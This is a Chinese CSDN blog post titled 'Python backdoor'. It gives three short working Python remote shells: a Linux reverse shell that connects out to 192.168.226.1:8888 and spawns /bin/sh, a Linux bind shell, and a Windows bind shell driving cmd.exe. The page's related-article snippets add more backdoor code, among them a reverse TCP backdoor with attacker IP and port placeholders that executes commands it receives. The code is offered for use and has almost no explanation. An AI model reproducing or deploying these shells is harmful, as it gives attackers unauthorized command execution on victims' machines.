Python后门

最新推荐文章于 2024-05-17 09:16:14 发布
最新推荐文章于 2024-05-17 09:16:14 发布
阅读量830 收藏 2
点赞数 2
分类专栏: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/luffysong/article/details/78800998
版权

linux反向

# !/usr/bin/env python
# -*- coding: utf-8 -*-
# @author Luffy
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.226.1",8888))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

linux正向

# !/usr/bin/env python
# -*- coding: utf-8 -*-
# @author Luffy
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind(("0.0.0.0",8888))
s.listen(5)
args,addr = s.accept()
print("connect from",addr)
p = subprocess.Popen(["/bin/sh","-i"], stdin=args,
                stdout=args, stderr=args, shell=True)

windows正向

# !/usr/bin/env python
# -*- coding: utf-8 -*-
# @author Luffy
from socket import *
import subprocess
import os, threading

#创建函数读取subprocess的输出
def func(args, proc):
        while True:
                msg = proc.stdout.readline()
                args.send(msg)

if __name__ == "__main__":
    server=socket(AF_INET,SOCK_STREAM)
    server.bind(('0.0.0.0',8888))
    server.listen(5)
    print 'waiting for connect'
    args, addr = server.accept()
    print 'connect from',addr
    proc = subprocess.Popen('cmd.exe /K', stdin=subprocess.PIPE, 
                stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
    t = threading.Thread(target=func,args=(args,proc))#创建新的线程读取返回,如果不创建新的线程,只能执行一次命令
    t.setDaemon(True)
    t.start()
    while True:
        cmd = args.recv(1024)#获取客户端命令行输入
        proc.stdin.write(cmd)#执行命令
        proc.stdin.flush()#刷新
路飞飞飞飞
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PYTHON写服务器后门
wocao___的博客
12-15 487
PYTHON写服务器后门(my_netcat.py) 不用上传后门了,服务器支持python2.7即可写入 #!/usr/bin/python import sys import socket import getopt import threading import subprocess #定义一些全局变量 listen = False command = False upload = False execute = "" target = "" upload_destination = "" port
Linux下python后门智能查杀脚本
11-13
这款查杀程序采用插件化实现,可以对新型的web后门添加自定义的查杀插件,现有的10余款插件已经能够查杀目前常见的大部分web后门,不过要注意的是现有的插件大多数都是查杀PHP后门的,asp及aspx不在覆盖范围,jsp的插件较少,因为当初写这个程序是为了解决linux下的webshell查杀问题。
Python-一个隐藏的基于Python的Windows后门
08-10
一个隐藏的基于Python的Windows后门,它使用Github作为命令和控制服务器
Python后门程序编写与远程控制_python编写程序对远程主机进行操控
最新发布
2401_84969997的博客
05-17 350
升级客户端和服务 源码 实现 循环交互。升级可以控制服务端程序。
Python3实现ICMP远控后门(下)之“Boss”出场
七夜的博客
05-17 831
ICMP后门   前言   第一篇:Python3实现ICMP远控后门(上) 第二篇:Python3实现ICMP远控后门(上)_补充篇 第三篇:Python3实现ICMP远控后门(中)之“嗅探”黑科技   熬到最后一篇了,本系列的Boss要出场了,实现了一个有意思的ICMP后门,暂时使用pyinstaller打包成了一个win32和64版本,如下图所示。     在前几篇的基础上,本...
python 反向连接后门
weixin_34198583的博客
03-15 240
1)首先daemon化 2)然后用 netstat命令,检测是否指定的IP(192.168.1.111)连接上,有,则激活 无,则睡眠几分钟(这个时间可根据需要自行调节) 3)激活后,开一个子进程,创建socket,与运行了监听程序的IP进行连接,并执行一个shell,将该 shell的输入输出重定向到socket. 4)父进程则等待 shell子进程的执行,如果执...
Sonaris:简单的Python后门
02-14
**Sonaris:简单的Python后门** Sonaris是一个Python编写的后门工具,它为渗透测试者和安全研究人员提供了一种方便的方式来远程控制目标系统。在本文中,我们将深入探讨Sonaris的功能、工作原理以及如何使用它,...
Back-X:Python后门生成器
02-17
后X _____________________ | | | AUTHOR: Gr3n0xX | | Initial commit: | | 16/02/2021 | | | |_____________________|
自己用python写的后门
09-01
总的来说,Python后门的编写涉及网络编程、进程管理、加密解密等多个知识点,对程序员的技能要求较高。然而,这样的技术应当被用于合法的系统维护和安全研究,而不是作为攻击工具。在日常工作中,我们更应该关注如何...
Python-Cloak一个智能的python后门框架
08-10
Cloak 一个智能的python后门框架
backsnakes:在 Linux 系统上使用的 COMP 8505 最终项目的 python 后门
07-08
背蛇在 Linux 系统上使用的 COMP 8505 最终项目的 python 后门
[原]使用python建立后门
PandaraWen 宝盒
11-05 1396
基本思路:     假设:待劫持文件为A.exe;构建后门脚本为backdoor.py;注入使用的DLL为inject.dll;     后门构建的一般思路为:重命名(或者移动)A.exe为xxx.exe,然后在backdoor中创建A.exe的进程--记为processA;然后向processA中注入DLL(学艺未精,不会写shellcode)创建一个反向连接通向服务器端;再向processA中
【实验】一句话后门利用及操作
weixin_34247299的博客
10-13 336
准备中
python编写简单后门程序(支持windows和linux且不乱码)
热门推荐
bwlab的博客
12-04 1万+
虽然不是自己写的,但是改了两个部分,网上发的这个,quit退出功能无法使用,因为传过来的字符串其实是加了\n的,为了更人性化,我加了去空格。 第二个部分就是windows下的乱码问题,这里我先用了decode进行解码,然后encode编码传过去 这个脚本可以用计划任务1分钟执行1次,不用担心脚本重启启动问题,因为端口被占用后是无法执行成功的 ,所以不用担心。 服务段退出可以不用quit,直接
Grok-backdoor:一款支持Ngrok隧道的强大Python后门工具
Karka_的博客
08-18 188
1、多平台支持,无需交叉编译:Linux、Windows、macOS;2、经过认证授权的Bind Shell;3、随机输出后门代码;4、Ngrok隧道支持绕过防火墙和代理限制;从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。
探索Python Backdoor:一款隐秘而强大的远程控制工具
gitblog_00042的博客
04-14 331
探索Python Backdoor:一款隐秘而强大的远程控制工具 项目地址:https://gitcode.com/xp4xbox/Python-Backdoor 项目简介 Python Backdoor 是一个开源项目,旨在创建一个隐蔽且功能丰富的Python后门程序。它允许用户通过网络进行远程控制和交互,为系统管理员、安全研究人员和开发者提供了一种便利但需谨慎使用的工具。 技术分析 该项目基于...
python-后门脚本编写
m0_58265086的博客
09-23 341
2.1 sql盲注脚本。
Python安全之编写反弹连接‘免杀’后门
weixin_43853965的博客
01-07 1282
生成后门的工具: 虽然在WEB安全专栏,不过今天要编写的是一个二进制后门,而不是WEB后门。按惯例还是来一段KALI里面的“免杀”后门生成工具,大名鼎鼎的metasploit: 方法一msfconsole: msf5 > use windows/shell/reverse_tcp msf5 payload(windows/shell/reverse_tcp) > set lhost...
用msfvenom生成一个Python后门并提供这个后门的源代码
03-26
由于我是AI语言模型,无法直接执行命令。以下是生成Python后门的步骤和示例代码: 1. 打开终端,输入以下命令生成Python格式的反向TCP后门: ``` msfvenom -p python/meterpreter/reverse_tcp LHOST=<Attacker IP> LPORT=<Attacker Port> -f raw > backdoor.py ``` 将`<Attacker IP>`和`<Attacker Port>`替换为攻击者的IP地址和端口号。 2. 生成的`backdoor.py`文件是包含后门代码的Python脚本。下面是示例代码: ``` #!/usr/bin/env python import socket import subprocess HOST = '<Attacker IP>' # 攻击者IP地址 PORT = <Attacker Port> # 攻击者端口号 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) while True: data = s.recv(1024) if data.decode().lower() == 'quit': break else: cmd = subprocess.Popen(data.decode(), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) stdout = cmd.stdout.read() + cmd.stderr.read() s.send(stdout) s.close() ``` 将`<Attacker IP>`和`<Attacker Port>`替换为使用的IP地址和端口号。后门将连接到攻击者的主机,等待接收命令并执行。攻击者可以通过发送命令控制受感染主机。 注意:这仅仅是一个示例,仅用于教育和研究目的。未经授权的攻击行为是违法的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值